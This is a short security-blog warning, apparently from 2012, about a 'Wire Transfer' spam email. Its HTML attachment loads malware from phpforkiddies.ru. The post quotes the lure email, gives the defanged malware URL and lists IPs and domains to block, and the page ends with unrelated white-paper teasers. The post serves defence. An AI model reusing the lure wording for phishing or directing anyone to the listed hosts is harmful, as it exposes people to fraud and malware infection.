The Latest in IT Security

“Wire Transfer” spam / phpforkiddies.ru

19
Jul
2012

This spam contains an attachment leading to malware on phpforkiddies.ru:

Date:      Wed, 18 Jul 2012 01:23:20 +0300
From:      “EUNA Wood” [[email protected]]
Subject:      Fwd: Wire Transfer (75073UQ608)
Attachments:     Wire_NFED_Rejected.htm

Dear Operator,

WIRE N: FED-9058663000926019

STATUS: REJECTED

You can find details in the attached file.

The attachment in this case is called Wire_NFED_Rejected.htm and contains a script that attempts to load malware from [donotclick]phpforkiddies.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here) which is multihomed on the following IPs:

The following IPs and domains are connected and should be blocked:
41.66.137.155
50.57.43.49
62.76.186.75
62.76.188.120
62.213.64.161
78.83.233.242
85.143.166.243
87.120.41.155
89.111.177.151
173.203.96.79
184.106.189.124
193.109.144.51
203.80.16.81
203.172.140.202
213.17.171.186

bmwforummsk.ru
forumenginesspb.ru
hamlovladivostok.ru
mazdaontours.ru
phpforkiddies.ru
porscheforumspb.ru

Leave a reply


Categories

THURSDAY, MARCH 28, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments